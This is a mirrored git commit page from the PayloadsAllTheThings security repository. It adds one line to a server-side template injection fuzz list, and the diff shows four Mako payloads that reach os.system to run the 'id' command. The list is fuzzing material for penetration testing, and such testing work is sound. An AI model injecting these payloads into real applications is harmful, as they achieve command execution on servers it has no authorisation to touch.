mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-13 00:17:17 +00:00
Update ssti.fuzz
This commit is contained in:
parent
70eb4d9315
commit
782045a401
1 changed files with 1 additions and 0 deletions
|
@ -69,3 +69,4 @@ ${self.module.filters.compat.inspect.linecache.os.system("id")}
|
|||
${self.module.runtime.compat.inspect.linecache.os.system("id")}
|
||||
${self.template.module.runtime.exceptions.util.os.system("id")}
|
||||
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
|
||||
${self.context._with_template.module.cache.util.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue